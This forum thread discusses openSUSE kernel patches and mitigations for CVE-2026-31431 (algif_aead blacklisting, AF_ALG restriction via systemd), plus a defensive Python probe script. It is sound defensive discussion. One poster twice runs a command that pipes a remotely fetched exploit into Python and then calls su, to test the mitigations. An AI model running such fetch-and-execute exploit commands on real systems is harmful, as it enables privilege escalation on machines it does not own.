hi,
I have installed all the latest updates and I cannot find a reference to a patch for CVE-2026-31431.
Is it just my mistake, or is there no patch yet for this bug on our openSUSE kernels? Or maybe it is not even an issue for openSUSE?
Fyi https://bugzilla.suse.com/show_bug.cgi?id=1262573
It is an issue for Leap 15.x/16.0 but not for current Tumbleweed kernels (6.19.12, 7.x.y). But there is an easy mitigation for the problem: https://copy.fail/#mitigation
Not a patch, but a temporary fix is there (from the SUSE website):
- Create a file /etc/modprobe.d/10-temp-cve-fix.conf with the following content:
```
blacklist algif_aead
install algif_aead /bin/false
```
- Do `sudo modprobe -r algif_aead`
- Reboot
So there will be a patch for 16.0 (and for 15.6) in future?
SUSE is working on it as we speak. And given the severity I expect it to be pushed out as soon as it’s ready.
I doubt it. Same as for 15.5, 15.4, …
Oh, I was afraid of that.
So the users who decided to wait for 16.1 are forced to weigh two risks:
installing the unpolished 16.0 or remaining on 15.6 with a critical security gap.
Do the mitigations mentioned above hold for 15.6 too?
Do they have any practical drawbacks?
@user42 AFAIK there will be an update pushed for Leap 15.6.
> So the users who decided to wait for 16.1 are forced to weigh two risks:
> installing the unpolished 16.0 or remaining on 15.6 with a critical security gap.
I have no idea why users would want that (skipping a version), but basically you are correct. Using unsupported software of any kind (not restricted to the operating system) can result in security problems that will not be fixed. In fact, that is what “unsupported” or “end of life” means.
The mitigation will work for 15.6 too. For normal users, especially desktop users, it is very unlikely that the mitigation will have any negative impact or have impact at all.
```
# more /etc/sysconfig/security |grep -v ^# |sort |uniq
CHECK_POLKIT_PRIVS="set"
PERMISSION_FSCAPS="no"
PERMISSION_SECURITY="paranoid local"
POLKIT_DEFAULT_PRIVS=""
# more /etc/permissions.d/permissions.local |grep -v ^# |sort |uniq
/usr/bin/clockdiff root:root 0755
/usr/bin/dumpcap root:wireshark 0750
/usr/bin/fusermount3 root:trusted 0750
/usr/lib/gstreamer-1.0/gst-ptp-helper root:root 0755
/usr/lib/utempter/utempter root:utmp 0755
# ls -alh /etc/permissions.d/permissions.local
-rw-r--r-- 1 root root 1.7K ... /etc/permissions.d/permissions.local
# permctl --system --warn
# permctl --system --set
# find / -perm /6000 -type f > /tmp/test.txt
# more /tmp/test.txt
# getcap -r /
# curl https://copy.fail/exp | python3.13 && su
# id
uid=1000(foo) gid=100(users) groups=100(users)
```
> installing the unpolished 16.0 or remaining on 15.6 with a critical security gap.
Arguably, given that yesterday was the EOL day for 15.6, if you opt to stick with that, you’re going to end up with security gaps (potentially critical) before 16.1 releases.
… and you are absolutely right with that…
That’s why I suggested prolonging the EOL of 15.6 until they succeed in providing a more reliable version of the 16 series. Hopefully this will be 16.1. And hopefully there won’t be any more situations like this where users are pressed to by openSUSE.
But let’s stop this… as OT.
For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state.
man systemd.exec
```
# more /etc/systemd/system/user@1000.service.d/99-user-foo.conf |grep -i addressfamilies
RestrictAddressFamilies=AF_UNIX AF_NETLINK AF_INET AF_INET6
# ls -alh /etc/systemd/system/user@1000.service.d/99-user-foo.conf
-rw-r--r-- 1 root root 2.5K ... /etc/systemd/system/user@1000.service.d/99-user-foo.conf
# curl https://copy.fail/exp | python3.13 && su
...
Traceback (most recent call last):
  File "<stdin>", line 9, in <module>
  File "<stdin>", line 5, in c
  File "/usr/lib64/python3.13/socket.py", line 233, in __init__
    _socket.socket.__init__(self, family, type, proto, fileno)
    ~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
OSError: [Errno 97] Address family not supported by protocol
```
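As an added example (not from the thread, SUSE or copy.fail), a Python check an admin can run to confirm that either mitigation discussed here is in effect: it parses a modprobe.d fragment for the blacklist/install lines quoted earlier, and probes whether an AF_ALG socket can be created and bound to an aead transform, which is the call the Errno 97 trace above shows failing under RestrictAddressFamilies=. The algorithm name gcm(aes) and the verdict labels are my assumptions, and the errno values are Linux ones.

```python
import errno
import socket


def modprobe_conf_blocks(conf_text, module="algif_aead"):
    """Report whether a modprobe.d fragment carries both lines of the quoted fix:
    'blacklist <module>' (stops alias autoload) and 'install <module> /bin/false'
    (makes an explicit modprobe fail too); /bin/true is accepted as an equivalent."""
    blacklist = install_override = False
    for raw in conf_text.splitlines():
        fields = raw.split("#", 1)[0].split()      # drop comments, tokenize
        if fields[:2] == ["blacklist", module]:
            blacklist = True
        elif fields[:2] == ["install", module] and fields[2:] in (["/bin/false"], ["/bin/true"]):
            install_override = True
    return {"blacklist": blacklist, "install_false": install_override}


def verdict(socket_errno, bind_errno):
    """Map the errnos of socket(AF_ALG, SOCK_SEQPACKET) and bind(('aead', alg)) onto a
    verdict; None means that call succeeded. Labels are this example's own."""
    if socket_errno == errno.EAFNOSUPPORT:
        return "af_alg_blocked"        # RestrictAddressFamilies= (the Errno 97 above) or no af_alg
    if socket_errno == errno.EPERM:
        return "socket_denied"         # a seccomp filter answering EPERM for socket()
    if socket_errno is not None:
        return "socket_error"
    if bind_errno == errno.ENOENT:
        return "aead_not_loadable"     # algif_aead absent and autoload blocked: modprobe mitigation
    if bind_errno is None:
        return "aead_reachable"        # the AF_ALG aead interface is usable: no mitigation in effect
    return "bind_error"


def probe_af_alg(alg="gcm(aes)"):
    """Live check on this host. Assumes gcm(aes) is registered in the kernel, so an
    ENOENT on bind points at the missing algif_aead module rather than the cipher."""
    if not hasattr(socket, "AF_ALG"):
        return "no_af_alg_support"     # non-Linux Python build
    try:
        sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
    except OSError as exc:
        return verdict(exc.errno, None)
    with sock:
        try:
            sock.bind(("aead", alg))
        except OSError as exc:
            return verdict(None, exc.errno)
    return verdict(None, None)


if __name__ == "__main__":
    print("AF_ALG aead probe:", probe_af_alg())
```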
Just FYI, the fixed 16.0 kernel is available:
```
rpm --changelog -q kernel-default-6.12.0-160000.29.1.x86_64| head -10
* Fr Mai 01 2026 nstange@suse.de
- crypto: authencesn - Fix src offset when decrypting in-place
  (bsc#1262573 CVE-2026-31431).
- commit 66d7b47
* Fr Mai 01 2026 nstange@suse.de
- crypto: authencesn - Do not place hiseq at end of dst for
  out-of-place decryption (bsc#1262573 CVE-2026-31431).
- commit d5fe1c6
...
```
run zypper refresh
confirm update to kernel 6.4.0-150600.23.100-default
> confirm update to kernel 6.4.0-150600.23.100-default
you mean 6.12.0-160000.29.1
After this morning’s update:
```
henk@boven:~> uname -r
6.12.0-160000.29-default
henk@boven:~>
```
The poster is referring to Leap 15.6…
For Leap 15.6, although EOL: https://bugzilla.suse.com/show_bug.cgi?id=1262573#c65